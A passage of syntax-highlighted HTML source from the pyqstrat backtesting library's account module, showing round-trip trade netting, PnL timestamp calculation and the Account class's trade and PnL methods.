class=\"p\">)</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"p\">[[</span><span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;price&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">]]</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span></div></div>\n \n\n<span class=\"k\">def</span> <span class=\"nf\">_get_calc_timestamps</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"n\">pnl_calc_time</span><span class=\"p\">:</span> <span class=\"nb\">int</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">:</span>\n <span class=\"n\">time_delta</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">timedelta64</span><span class=\"p\">(</span><span class=\"n\">pnl_calc_time</span><span class=\"p\">,</span> <span class=\"s1\">&#39;m&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">calc_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"o\">.</span><span class=\"n\">astype</span><span class=\"p\">(</span><span class=\"s1\">&#39;M8[D]&#39;</span><span class=\"p\">))</span> <span class=\"o\">+</span> <span class=\"n\">time_delta</span>\n <span class=\"n\">calc_indices</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">searchsorted</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">calc_timestamps</span><span class=\"p\">,</span> <span class=\"n\">side</span><span class=\"o\">=</span><span class=\"s1\">&#39;left&#39;</span><span class=\"p\">)</span> <span class=\"o\">-</span> <span class=\"mi\">1</span>\n <span class=\"k\">if</span> <span class=\"n\">calc_indices</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span> <span class=\"n\">calc_indices</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"mi\">0</span>\n <span class=\"k\">return</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"n\">calc_indices</span><span class=\"p\">])</span>\n\n\n<span class=\"k\">def</span> <span class=\"nf\">_net_trade</span><span class=\"p\">(</span><span class=\"n\">stack</span><span class=\"p\">:</span> <span class=\"n\">deque</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"p\">:</span> <span class=\"n\">Trade</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">RoundTripTrade</span> <span class=\"o\">|</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">stack</span><span class=\"p\">)</span> <span class=\"ow\">or</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sign</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sign</span><span class=\"p\">(</span><span class=\"n\">stack</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">):</span>\n <span class=\"n\">stack</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"kc\">None</span>\n \n <span class=\"n\">entry</span> <span class=\"o\">=</span> <span class=\"n\">stack</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n <span class=\"n\">qty</span> <span class=\"o\">=</span> <span class=\"nb\">min</span><span class=\"p\">(</span><span class=\"nb\">abs</span><span class=\"p\">(</span><span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">),</span> <span class=\"nb\">abs</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">))</span> <span class=\"o\">*</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sign</span><span class=\"p\">(</span><span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">)</span>\n <span class=\"n\">pnl</span> <span class=\"o\">=</span> <span class=\"n\">qty</span> <span class=\"o\">*</span> <span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">price</span> <span class=\"o\">-</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">price</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span> <span class=\"o\">-</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">commission</span> <span class=\"o\">-</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">commission</span>\n <span class=\"n\">entry_reason_code</span> <span class=\"o\">=</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"o\">.</span><span class=\"n\">reason_code</span> <span class=\"k\">if</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">order</span> <span class=\"k\">else</span> <span class=\"s1\">&#39;&#39;</span>\n <span class=\"n\">exit_reason_code</span> <span class=\"o\">=</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"o\">.</span><span class=\"n\">reason_code</span> <span class=\"k\">if</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span> <span class=\"k\">else</span> <span class=\"s1\">&#39;&#39;</span>\n <span class=\"n\">rt</span> <span class=\"o\">=</span> <span class=\"n\">RoundTripTrade</span><span class=\"p\">(</span><span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"p\">,</span> \n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"p\">,</span> \n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">,</span>\n <span class=\"n\">qty</span><span class=\"p\">,</span> \n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">price</span><span class=\"p\">,</span> \n <span class=\"n\">entry_reason_code</span><span class=\"p\">,</span> <span class=\"n\">exit_reason_code</span><span class=\"p\">,</span>\n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">commission</span><span class=\"p\">,</span>\n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">properties</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">properties</span><span class=\"p\">,</span>\n <span class=\"n\">pnl</span><span class=\"p\">)</span>\n <span class=\"n\">resid</span> <span class=\"o\">=</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"o\">-</span> <span class=\"n\">qty</span>\n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"o\">-=</span> <span class=\"n\">qty</span>\n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"o\">+=</span> <span class=\"n\">qty</span>\n <span class=\"k\">if</span> <span class=\"n\">resid</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span>\n <span class=\"n\">stack</span><span class=\"o\">.</span><span class=\"n\">popleft</span><span class=\"p\">()</span>\n <span class=\"k\">return</span> <span class=\"n\">rt</span>\n\n\n<span class=\"k\">def</span> <span class=\"nf\">_roundtrip_trades</span><span class=\"p\">(</span><span class=\"n\">trades</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">],</span>\n <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">RoundTripTrade</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> &gt;&gt;&gt; qtys = [100, -50, 20, -120, 10]</span>\n<span class=\"sd\"> &gt;&gt;&gt; prices = [9, 10, 8, 11, 12] </span>\n<span class=\"sd\"> &gt;&gt;&gt; trades = []</span>\n<span class=\"sd\"> &gt;&gt;&gt; contract = SimpleNamespace(symbol=&#39;AAPL&#39;, contract_group=&#39;AAPL&#39;, multiplier=1)</span>\n<span class=\"sd\"> &gt;&gt;&gt; order = SimpleNamespace(reason_code=&#39;DUMMY&#39;)</span>\n<span class=\"sd\"> &gt;&gt;&gt; for i, qty in enumerate(qtys):</span>\n<span class=\"sd\"> ... timestamp = np.datetime64(&#39;2022-11-05 08:00&#39;) + np.timedelta64(i, &#39;m&#39;)</span>\n<span class=\"sd\"> ... trades.append(Trade(contract, order, timestamp, qty, prices[i]))</span>\n<span class=\"sd\"> &gt;&gt;&gt; rts = _roundtrip_trades(trades, &#39;AAPL&#39;)</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert [(rt.qty, rt.entry_price, rt.exit_price, rt.net_pnl) for rt in rts] == [</span>\n<span class=\"sd\"> ... (50, 9, 10, 50.0), (50, 9, 11, 100.0), (20, 8, 11, 60.0), (-10, 11, 12, -10.0)]</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">rts</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">RoundTripTrade</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"n\">stacks</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">deque</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">defaultdict</span><span class=\"p\">(</span><span class=\"n\">deque</span><span class=\"p\">)</span>\n\n <span class=\"k\">for</span> <span class=\"n\">_trade</span> <span class=\"ow\">in</span> <span class=\"n\">trades</span><span class=\"p\">:</span>\n <span class=\"n\">trade</span> <span class=\"o\">=</span> <span class=\"n\">copy</span><span class=\"o\">.</span><span class=\"n\">deepcopy</span><span class=\"p\">(</span><span class=\"n\">_trade</span><span class=\"p\">)</span>\n <span class=\"k\">while</span> <span class=\"kc\">True</span><span class=\"p\">:</span>\n <span class=\"n\">rt</span> <span class=\"o\">=</span> <span class=\"n\">_net_trade</span><span class=\"p\">(</span><span class=\"n\">stacks</span><span class=\"p\">[</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"p\">],</span> <span class=\"n\">trade</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">rt</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"k\">break</span>\n <span class=\"n\">rts</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">rt</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span> <span class=\"k\">break</span>\n\n <span class=\"k\">return</span> <span class=\"p\">[</span><span class=\"n\">rt</span> <span class=\"k\">for</span> <span class=\"n\">rt</span> <span class=\"ow\">in</span> <span class=\"n\">rts</span> <span class=\"k\">if</span> <span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnat</span><span class=\"p\">(</span><span class=\"n\">start_date</span><span class=\"p\">)</span> <span class=\"ow\">or</span> <span class=\"n\">rt</span><span class=\"o\">.</span><span class=\"n\">entry_timestamp</span> <span class=\"o\">&gt;=</span> <span class=\"n\">start_date</span><span class=\"p\">)</span> <span class=\"ow\">and</span> <span class=\"p\">(</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnat</span><span class=\"p\">(</span><span class=\"n\">end_date</span><span class=\"p\">)</span> <span class=\"ow\">or</span> <span class=\"n\">rt</span><span class=\"o\">.</span><span class=\"n\">exit_timestamp</span> <span class=\"o\">&lt;=</span> <span class=\"n\">end_date</span><span class=\"p\">)</span> <span class=\"ow\">and</span> <span class=\"p\">(</span>\n <span class=\"n\">contract_group</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span> <span class=\"ow\">or</span> <span class=\"n\">rt</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">contract_group</span> <span class=\"o\">==</span> <span class=\"n\">contract_group</span><span class=\"p\">)]</span>\n\n\n<div class=\"viewcode-block\" id=\"Account\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">Account</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;An Account calculates pnl for a set of contracts&#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"Account.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">contract_groups</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">ContractGroup</span><span class=\"p\">],</span> \n <span class=\"n\">timestamps</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span>\n <span class=\"n\">price_function</span><span class=\"p\">:</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">SimpleNamespace</span><span class=\"p\">],</span> <span class=\"nb\">float</span><span class=\"p\">],</span>\n <span class=\"n\">strategy_context</span><span class=\"p\">:</span> <span class=\"n\">SimpleNamespace</span><span class=\"p\">,</span>\n <span class=\"n\">starting_equity</span><span class=\"p\">:</span> <span class=\"nb\">float</span> <span class=\"o\">=</span> <span class=\"mf\">1.0e6</span><span class=\"p\">,</span> \n <span class=\"n\">pnl_calc_time</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"mi\">15</span> <span class=\"o\">*</span> <span class=\"mi\">60</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_groups: Contract groups that we want to compute PNL for</span>\n<span class=\"sd\"> timestamps: Timestamps that we might compute PNL at</span>\n<span class=\"sd\"> price_function: Function that returns contract prices used to compute pnl</span>\n<span class=\"sd\"> strategy_context: This is passed into the price function so we can use current state of strategy to compute prices</span>\n<span class=\"sd\"> starting_equity: Starting equity in account currency. Default 1.e6</span>\n<span class=\"sd\"> pnl_calc_time: Number of minutes past midnight that we should calculate PNL at. Default 15 * 60, i.e. 3 pm</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">starting_equity</span> <span class=\"o\">=</span> <span class=\"n\">starting_equity</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_price_function</span> <span class=\"o\">=</span> <span class=\"n\">price_function</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategy_context</span> <span class=\"o\">=</span> <span class=\"n\">strategy_context</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">timestamps</span> <span class=\"o\">=</span> <span class=\"n\">timestamps</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">calc_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">_get_calc_timestamps</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">pnl_calc_time</span><span class=\"p\">)</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">:</span> <span class=\"nb\">set</span><span class=\"p\">[</span><span class=\"n\">Contract</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"nb\">set</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trades</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_pnl</span> <span class=\"o\">=</span> <span class=\"n\">SortedDict</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls_by_contract_group</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">ContractPNL</span><span class=\"p\">]]</span> <span class=\"o\">=</span> <span class=\"n\">defaultdict</span><span class=\"p\">(</span><span class=\"nb\">list</span><span class=\"p\">)</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">ContractPNL</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.symbols\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.symbols\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">symbols</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]:</span>\n <span class=\"k\">return</span> <span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">]</span></div>\n \n <span class=\"k\">def</span> <span class=\"nf\">_add_contract</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract</span><span class=\"p\">:</span> <span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">:</span> \n <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;Already have contract with symbol: </span><span class=\"si\">{</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">contract</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">contract_pnl</span> <span class=\"o\">=</span> <span class=\"n\">ContractPNL</span><span class=\"p\">(</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_price_function</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategy_context</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">contract_pnl</span>\n <span class=\"c1\"># For fast lookup in position function</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls_by_contract_group</span><span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">contract_pnl</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"o\">.</span><span class=\"n\">add</span><span class=\"p\">(</span><span class=\"n\">contract</span><span class=\"p\">)</span>\n \n<div class=\"viewcode-block\" id=\"Account.add_trades\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.add_trades\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">add_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">trades</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"n\">trades</span> <span class=\"o\">=</span> <span class=\"nb\">sorted</span><span class=\"p\">(</span><span class=\"n\">trades</span><span class=\"p\">,</span> <span class=\"n\">key</span><span class=\"o\">=</span><span class=\"k\">lambda</span> <span class=\"n\">x</span><span class=\"p\">:</span> <span class=\"nb\">getattr</span><span class=\"p\">(</span><span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">))</span>\n <span class=\"c1\"># Break up trades by contract so we can add them in a batch</span>\n <span class=\"n\">trades_by_contract</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">]]</span> <span class=\"o\">=</span> <span class=\"n\">defaultdict</span><span class=\"p\">(</span><span class=\"nb\">list</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">trades</span><span class=\"p\">:</span>\n <span class=\"n\">contract</span> <span class=\"o\">=</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">contract</span>\n <span class=\"k\">if</span> <span class=\"n\">contract</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">:</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_add_contract</span><span class=\"p\">(</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"n\">trades_by_contract</span><span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"p\">)</span>\n \n <span class=\"k\">for</span> <span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"n\">contract_trades</span> <span class=\"ow\">in</span> <span class=\"n\">trades_by_contract</span><span class=\"o\">.</span><span class=\"n\">items</span><span class=\"p\">():</span>\n <span class=\"n\">contract_trades</span><span class=\"o\">.</span><span class=\"n\">sort</span><span class=\"p\">(</span><span class=\"n\">key</span><span class=\"o\">=</span><span class=\"k\">lambda</span> <span class=\"n\">x</span><span class=\"p\">:</span> <span class=\"n\">x</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">)</span> <span class=\"c1\"># type: ignore</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">_add_trades</span><span class=\"p\">(</span><span class=\"n\">contract_trades</span><span class=\"p\">)</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trades</span> <span class=\"o\">+=</span> <span class=\"n\">trades</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.calc\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.calc\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">calc</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Computes P&amp;L and stores it internally for all contracts.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> timestamp: timestamp to compute P&amp;L at. Account remembers the last timestamp it computed P&amp;L up to and will compute P&amp;L</span>\n<span class=\"sd\"> between these and including timestamp. If there is more than one day between the last index and current index, we will </span>\n<span class=\"sd\"> include pnl for at the defined pnl_calc_time for those dates as well.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_pnl</span><span class=\"p\">:</span> <span class=\"k\">return</span>\n \n <span class=\"n\">prev_idx</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"n\">prev_timestamp</span> <span class=\"o\">=</span> <span class=\"kc\">None</span> <span class=\"k\">if</span> <span class=\"n\">prev_idx</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span> <span class=\"k\">else</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"n\">prev_idx</span><span class=\"p\">]</span>\n \n <span class=\"c1\"># Find the last timestamp per day that is between the previous index we computed and the current index,</span>\n <span class=\"c1\"># so we can compute daily pnl in addition to the current index pnl</span>\n <span class=\"n\">calc_timestamps</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">calc_timestamps</span>\n <span class=\"n\">intermediate_calc_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">calc_timestamps</span><span class=\"p\">[</span><span class=\"n\">calc_timestamps</span> <span class=\"o\">&lt;=</span> <span class=\"n\">timestamp</span><span class=\"p\">]</span>\n <span class=\"k\">if</span> <span class=\"n\">prev_timestamp</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span 